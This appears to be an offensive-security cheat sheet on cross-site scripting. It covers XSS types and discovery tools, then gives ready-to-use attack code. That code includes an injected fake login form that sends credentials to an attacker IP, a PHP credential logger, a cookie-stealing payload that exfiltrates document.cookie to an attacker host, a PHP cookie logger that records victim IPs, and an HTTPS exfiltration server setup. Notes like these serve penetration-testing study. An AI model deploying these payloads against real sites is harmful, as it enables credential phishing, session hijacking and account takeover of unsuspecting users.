XSS
Cross-Site Scripting
When a vulnerable webapp receiving HTML code from back-end and rendering it on client-side does not properly santize user input its possible to inject Javascript code into input fields.
XSS Attacks
Stored XSS is persistant meaning stored on server and will affect any user which visits the page.
Non-persistent meaning not stored on server and temporary. Reflected XSS gets processed by server and DOM-based XSS is fully processed on client-side, never reaching back-end server.
Stored XSS
Most critical, occurs when user input is stored on back-end database.
Reflected XSS
Occurs when user input is displayed after being processed by backend server.
DOM XSS
Occurs when user input is directly shown in the browser and is completely processed on the client-side
XXS Discovery
Use automated scanners like Nessus, Nikto, Burp, ZAP. Or open source tools:
XSS strik
Brute XSS
XSSer
Manuallly test using XSS payloads intro input elements and HTTP headers. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md
Code review, understand how input is being handled to write custsom payloads.
XSS Attacks
There is defacing where we can change the look and feel of website, even changing text.
Phishing attack
# Create Login page
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>Payload
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.24:8888><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--Simple PHP script
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://SERVER_IP/phishing/index.php");
fclose($file);
exit();
}
?>Session Hijacking
Its possible to use JavaScript to collect victim's cookies and send them to their own server and login.
Sometimes we can't see how our input is handled which is called Blind XSS, we can still check for vulns by using http requests.
# Write this line to script.js
new Image().src='http://PWNIP:PWNPO/index.php?c='+document.cookie;
# Host index.php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
# Start listener
php -S 0.0.0.0:8080
# Execute payload
"><script src=http://PWNIP:PWNPO/script.js></script> HTTPS Exfiltration
Modern browsers prevent HTTPS website from loading resources via unencrypted HTTP connections, so if we were to accept a cookie we can use a regular python http server. Setup https python server.
# Create certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Python server
from http import server
import ssl
httpd = server.HTTPServer(('0.0.0.0', 4443), server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever() from http import server
import ssl
httpd = server.HTTPServer(('0.0.0.0', 4443), server.SimpleHTTPRequestHandler)
# Create SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='./server.pem')
# Wrap socket with the context
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()Last updated
Was this helpful?